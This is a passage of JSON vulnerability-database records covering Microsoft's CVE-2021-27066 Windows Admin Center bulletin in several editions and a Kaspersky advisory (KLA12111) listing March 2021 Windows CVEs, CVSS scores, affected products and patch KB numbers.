"userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-10-01T12:44:16", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-21T10:45:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-21T10:45:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T12:44:16", "differentElements": ["msAffectedSoftware", "vendorCvss"], "edition": 103}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "f48b224e65ca63a954b1a862163a3fe2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-10-04T22:43:54", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-10-04T22:43:54", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-10-04T22:43:54", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {"baseScore": "4.3", "temporalScore": "3.8", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:U/RL:O/RC:C"}}, "lastseen": "2021-10-04T22:43:54", "differentElements": ["msAffectedSoftware"], "edition": 104}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "232c02d02ff07d812a70bf00110d2532", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-10-06T08:43:52", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-10-04T22:43:54", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-10-04T22:43:54", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {"baseScore": "4.3", "temporalScore": "3.8", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:U/RL:O/RC:C"}}, "lastseen": "2021-10-06T08:43:52", "differentElements": ["msAffectedSoftware"], "edition": 105}], "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-10-06T10:48:06", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-10-06T10:48:06", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {"baseScore": "4.3", "temporalScore": "3.8", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:U/RL:O/RC:C"}, "_object_type": "robots.models.mscve.MsCveBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.mscve.MsCveBulletin"]}], "kaspersky": [{"id": "KLA12111", "hash": "b223fb04d56be753847193e2f62192f4", "type": "kaspersky", "bulletinFamily": "info", "title": "KLA12111 Multiple vulnerabilities in Microsoft Windows", "description": "### *Detect date*:\n03/09/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, cause denial of service, bypass security restrictions, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2012 R2 \nWindows Server, version 1909 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 2004 for x64-based Systems \nWindows RT 8.1 \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Admin Center \nWindows 10 Version 20H2 for x64-based Systems \nHEVC Video Extensions \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2016 \nWindows 10 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2012 \nWindows Server, version 20H2 (Server Core Installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2012 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-26899](<https://nvd.nist.gov/vuln/detail/CVE-2021-26899>) \n[CVE-2021-26876](<https://nvd.nist.gov/vuln/detail/CVE-2021-26876>) \n[CVE-2021-1729](<https://nvd.nist.gov/vuln/detail/CVE-2021-1729>) \n[CVE-2021-26875](<https://nvd.nist.gov/vuln/detail/CVE-2021-26875>) \n[CVE-2021-27048](<https://nvd.nist.gov/vuln/detail/CVE-2021-27048>) \n[CVE-2021-26866](<https://nvd.nist.gov/vuln/detail/CVE-2021-26866>) \n[CVE-2021-26902](<https://nvd.nist.gov/vuln/detail/CVE-2021-26902>) \n[CVE-2021-26886](<https://nvd.nist.gov/vuln/detail/CVE-2021-26886>) \n[CVE-2021-27066](<https://nvd.nist.gov/vuln/detail/CVE-2021-27066>) \n[CVE-2021-27063](<https://nvd.nist.gov/vuln/detail/CVE-2021-27063>) \n[CVE-2021-27050](<https://nvd.nist.gov/vuln/detail/CVE-2021-27050>) \n[CVE-2021-26889](<https://nvd.nist.gov/vuln/detail/CVE-2021-26889>) \n[CVE-2021-26890](<https://nvd.nist.gov/vuln/detail/CVE-2021-26890>) \n[CVE-2021-26895](<https://nvd.nist.gov/vuln/detail/CVE-2021-26895>) \n[CVE-2021-26885](<https://nvd.nist.gov/vuln/detail/CVE-2021-26885>) \n[CVE-2021-24107](<https://nvd.nist.gov/vuln/detail/CVE-2021-24107>) \n[CVE-2021-26892](<https://nvd.nist.gov/vuln/detail/CVE-2021-26892>) \n[CVE-2021-24090](<https://nvd.nist.gov/vuln/detail/CVE-2021-24090>) \n[CVE-2021-24110](<https://nvd.nist.gov/vuln/detail/CVE-2021-24110>) \n[CVE-2021-24095](<https://nvd.nist.gov/vuln/detail/CVE-2021-24095>) \n[CVE-2021-26887](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-26887>) \n[CVE-2021-24089](<https://nvd.nist.gov/vuln/detail/CVE-2021-24089>) \n[CVE-2021-26878](<https://nvd.nist.gov/vuln/detail/CVE-2021-26878>) \n[CVE-2021-27077](<https://nvd.nist.gov/vuln/detail/CVE-2021-27077>) \n[CVE-2021-26894](<https://nvd.nist.gov/vuln/detail/CVE-2021-26894>) \n[CVE-2021-26884](<https://nvd.nist.gov/vuln/detail/CVE-2021-26884>) \n[CVE-2021-26898](<https://nvd.nist.gov/vuln/detail/CVE-2021-26898>) \n[CVE-2021-26864](<https://nvd.nist.gov/vuln/detail/CVE-2021-26864>) \n[CVE-2021-27061](<https://nvd.nist.gov/vuln/detail/CVE-2021-27061>) \n[CVE-2021-26865](<https://nvd.nist.gov/vuln/detail/CVE-2021-26865>) \n[CVE-2021-26891](<https://nvd.nist.gov/vuln/detail/CVE-2021-26891>) \n[CVE-2021-26893](<https://nvd.nist.gov/vuln/detail/CVE-2021-26893>) \n[CVE-2021-26896](<https://nvd.nist.gov/vuln/detail/CVE-2021-26896>) \n[CVE-2021-26867](<https://nvd.nist.gov/vuln/detail/CVE-2021-26867>) \n[CVE-2021-27049](<https://nvd.nist.gov/vuln/detail/CVE-2021-27049>) \n[CVE-2021-27070](<https://nvd.nist.gov/vuln/detail/CVE-2021-27070>) \n[CVE-2021-26869](<https://nvd.nist.gov/vuln/detail/CVE-2021-26869>) \n[CVE-2021-26868](<https://nvd.nist.gov/vuln/detail/CVE-2021-26868>) \n[CVE-2021-26877](<https://nvd.nist.gov/vuln/detail/CVE-2021-26877>) \n[CVE-2021-1640](<https://nvd.nist.gov/vuln/detail/CVE-2021-1640>) \n[CVE-2021-27062](<https://nvd.nist.gov/vuln/detail/CVE-2021-27062>) \n[CVE-2021-26880](<https://nvd.nist.gov/vuln/detail/CVE-2021-26880>) \n[CVE-2021-26879](<https://nvd.nist.gov/vuln/detail/CVE-2021-26879>) \n[CVE-2021-26870](<https://nvd.nist.gov/vuln/detail/CVE-2021-26870>) \n[CVE-2021-26897](<https://nvd.nist.gov/vuln/detail/CVE-2021-26897>) \n[CVE-2021-26872](<https://nvd.nist.gov/vuln/detail/CVE-2021-26872>) \n[CVE-2021-26861](<https://nvd.nist.gov/vuln/detail/CVE-2021-26861>) \n[CVE-2021-26901](<https://nvd.nist.gov/vuln/detail/CVE-2021-26901>) \n[CVE-2021-27047](<https://nvd.nist.gov/vuln/detail/CVE-2021-27047>) \n[CVE-2021-26881](<https://nvd.nist.gov/vuln/detail/CVE-2021-26881>) \n[CVE-2021-26900](<https://nvd.nist.gov/vuln/detail/CVE-2021-26900>) \n[CVE-2021-27051](<https://nvd.nist.gov/vuln/detail/CVE-2021-27051>) \n[CVE-2021-26882](<https://nvd.nist.gov/vuln/detail/CVE-2021-26882>) \n[CVE-2021-26871](<https://nvd.nist.gov/vuln/detail/CVE-2021-26871>) \n[CVE-2021-26860](<https://nvd.nist.gov/vuln/detail/CVE-2021-26860>) \n[CVE-2021-26863](<https://nvd.nist.gov/vuln/detail/CVE-2021-26863>) \n[CVE-2021-26862](<https://nvd.nist.gov/vuln/detail/CVE-2021-26862>) \n[CVE-2021-26874](<https://nvd.nist.gov/vuln/detail/CVE-2021-26874>) \n[CVE-2021-26873](<https://nvd.nist.gov/vuln/detail/CVE-2021-26873>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-26899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26899>)7.2High \n[CVE-2021-26876](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26876>)6.8High \n[CVE-2021-1729](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1729>)7.2High \n[CVE-2021-26875](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26875>)4.6Warning \n[CVE-2021-27048](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27048>)6.8High \n[CVE-2021-26866](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26866>)3.6Warning \n[CVE-2021-26902](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26902>)6.8High \n[CVE-2021-26886](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26886>)3.6Warning \n[CVE-2021-27066](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27066>)4.0Warning \n[CVE-2021-27063](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27063>)5.0Critical \n[CVE-2021-27050](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27050>)6.8High \n[CVE-2021-26889](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26889>)4.6Warning \n[CVE-2021-26890](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26890>)4.6Warning \n[CVE-2021-26895](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26895>)10.0Critical \n[CVE-2021-26885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26885>)4.6Warning \n[CVE-2021-24107](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24107>)2.1Warning \n[CVE-2021-26892](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26892>)2.1Warning \n[CVE-2021-24090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24090>)9.3Critical \n[CVE-2021-24110](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24110>)6.8High \n[CVE-2021-24095](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24095>)4.6Warning \n[CVE-2021-26887](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26887>)4.6Warning \n[CVE-2021-24089](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24089>)6.8High \n[CVE-2021-26878](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26878>)4.6Warning \n[CVE-2021-27077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27077>)4.6Warning \n[CVE-2021-26894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26894>)10.0Critical \n[CVE-2021-26884](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26884>)2.1Warning \n[CVE-2021-26898](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26898>)7.2High \n[CVE-2021-26864](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26864>)4.6Warning \n[CVE-2021-27061](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27061>)6.8High \n[CVE-2021-26865](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26865>)4.6Warning \n[CVE-2021-26891](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26891>)4.6Warning \n[CVE-2021-26893](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26893>)7.5Critical \n[CVE-2021-26896](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26896>)5.0Critical \n[CVE-2021-26867](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26867>)7.2High \n[CVE-2021-27049](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27049>)6.8High \n[CVE-2021-27070](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27070>)9.3Critical \n[CVE-2021-26869](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26869>)2.1Warning \n[CVE-2021-26868](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26868>)4.6Warning \n[CVE-2021-26877](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26877>)7.5Critical \n[CVE-2021-1640](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1640>)4.6Warning \n[CVE-2021-27062](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27062>)6.8High \n[CVE-2021-26880](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26880>)4.6Warning \n[CVE-2021-26879](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26879>)5.0Critical \n[CVE-2021-26870](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26870>)4.6Warning \n[CVE-2021-26897](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26897>)10.0Critical \n[CVE-2021-26872](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26872>)4.6Warning \n[CVE-2021-26861](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26861>)6.8High \n[CVE-2021-26901](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26901>)7.2High \n[CVE-2021-27047](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27047>)6.8High \n[CVE-2021-26881](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26881>)6.5High \n[CVE-2021-26900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26900>)7.2High \n[CVE-2021-27051](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27051>)6.8High \n[CVE-2021-26882](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26882>)4.6Warning \n[CVE-2021-26871](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26871>)4.6Warning \n[CVE-2021-26860](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26860>)4.6Warning \n[CVE-2021-26863](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26863>)7.2High \n[CVE-2021-26862](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26862>)7.2High \n[CVE-2021-26874](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26874>)4.6Warning \n[CVE-2021-26873](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26873>)4.6Warning\n\n### *KB list*:\n[5000809](<http://support.microsoft.com/kb/5000809>) \n[5000822](<http://support.microsoft.com/kb/5000822>) \n[5000847](<http://support.microsoft.com/kb/5000847>) \n[5000808](<http://support.microsoft.com/kb/5000808>) \n[5000803](<http://support.microsoft.com/kb/5000803>) \n[5000807](<http://support.microsoft.com/kb/5000807>) \n[5000848](<http://support.microsoft.com/kb/5000848>) \n[5000802](<http://support.microsoft.com/kb/5000802>) \n[5000853](<http://support.microsoft.com/kb/5000853>) \n[5000840](<http://support.microsoft.com/kb/5000840>)\n\n### *Microsoft official advisories*:", "published": "2021-03-09T00:00:00", "modified": "2021-06-22T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA12111/", "reporter": "Kaspersky Lab", "references": ["https://threats.kaspersky.com/en/class/Exploit/", "https://nvd.nist.gov/vuln/detail/CVE-2021-26899", "https://nvd.nist.gov/vuln/detail/CVE-2021-26876", "https://nvd.nist.gov/vuln/detail/CVE-2021-1729", "https://nvd.nist.gov/vuln/detail/CVE-2021-26875", "https://nvd.nist.gov/vuln/detail/CVE-2021-27048", "https://nvd.nist.gov/vuln/detail/CVE-2021-26866", "https://nvd.nist.gov/vuln/detail/CVE-2021-26902", "https://nvd.nist.gov/vuln/detail/CVE-2021-26886", "https://nvd.nist.gov/vuln/detail/CVE-2021-27066", "https://nvd.nist.gov/vuln/detail/CVE-2021-27063", "https://nvd.nist.gov/vuln/detail/CVE-2021-27050", "https://nvd.nist.gov/vuln/detail/CVE-2021-26889", "https://nvd.nist.gov/vuln/detail/CVE-2021-26890", "https://nvd.nist.gov/vuln/detail/CVE-2021-26895", "https://nvd.nist.gov/vuln/detail/CVE-2021-26885", "https://nvd.nist.gov/vuln/detail/CVE-2021-24107", "https://nvd.nist.gov/vuln/detail/CVE-2021-26892", "https://nvd.nist.gov/vuln/detail/CVE-2021-24090", "https://nvd.nist.gov/vuln/detail/CVE-2021-24110", "https://nvd.nist.gov/vuln/detail/CVE-2021-24095", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-26887", "https://nvd.nist.gov/vuln/detail/CVE-2021-24089", "https://nvd.nist.gov/vuln/detail/CVE-2021-26878", "https://nvd.nist.gov/vuln/detail/CVE-2021-27077", "https://nvd.nist.gov/vuln/detail/CVE-2021-26894", "https://nvd.nist.gov/vuln/detail/CVE-2021-26884", "https://nvd.nist.gov/vuln/detail/CVE-2021-26898", "https://nvd.nist.gov/vuln/detail/CVE-2021-26864", "https://nvd.nist.gov/vuln/detail/CVE-2021-27061", "https://nvd.nist.gov/vuln/detail/CVE-2021-26865", "https://nvd.nist.gov/vuln/detail/CVE-2021-26891", "https://nvd.nist.gov/vuln/detail/CVE-2021-26893", "https://nvd.nist.gov/vuln/detail/CVE-2021-26896", "https://nvd.nist.gov/vuln/detail/CVE-2021-26867", "https://nvd.nist.gov/vuln/detail/CVE-2021-27049", "https://nvd.nist.gov/vuln/detail/CVE-2021-27070", "https://nvd.nist.gov/vuln/detail/CVE-2021-26869", "https://nvd.nist.gov/vuln/detail/CVE-2021-26868", "https://nvd.nist.gov/vuln/detail/CVE-2021-26877", "https://nvd.nist.gov/vuln/detail/CVE-2021-1640", "https://nvd.nist.gov/vuln/detail/CVE-2021-27062", "https://nvd.nist.gov/vuln/detail/CVE-2021-26880", "https://nvd.nist.gov/vuln/detail/CVE-2021-26879", "https://nvd.nist.gov/vuln/detail/CVE-2021-26870", "https://nvd.nist.gov/vuln/detail/CVE-2021-26897", "https://nvd.nist.gov/vuln/detail/CVE-2021-26872", "https://nvd.nist.gov/vuln/detail/CVE-2021-26861", "https://nvd.nist.gov/vuln/detail/CVE-2021-26901", "https://nvd.nist.gov/vuln/detail/CVE-2021-27047", "https://nvd.nist.gov/vuln/detail/CVE-2021-26881", "https://nvd.nist.gov/vuln/detail/CVE-2021-26900", "https://nvd.nist.gov/vuln/detail/CVE-2021-27051", "https://nvd.nist.gov/vuln/detail/CVE-2021-26882", "https://nvd.nist.gov/vuln/detail/CVE-2021-26871", "https://nvd.nist.gov/vuln/detail/CVE-2021-26860", "https://nvd.nist.gov/vuln/detail/CVE-2021-26863", "https://nvd.nist.gov/vuln/detail/CVE-2021-26862", "https://nvd.nist.gov/vuln/detail/CVE-2021-26874", "https://nvd.nist.gov/vuln/detail/CVE-2021-26873", "https://threats.kaspersky.com/en/product/Microsoft-Windows/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2012/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-8/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-7/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2008/", "https://threats.kaspersky.com/en/product/Windows-RT/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-10/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26899", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26876", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1729", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26875", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27048", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26866", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26902", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26886", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27066", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27063", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27050", 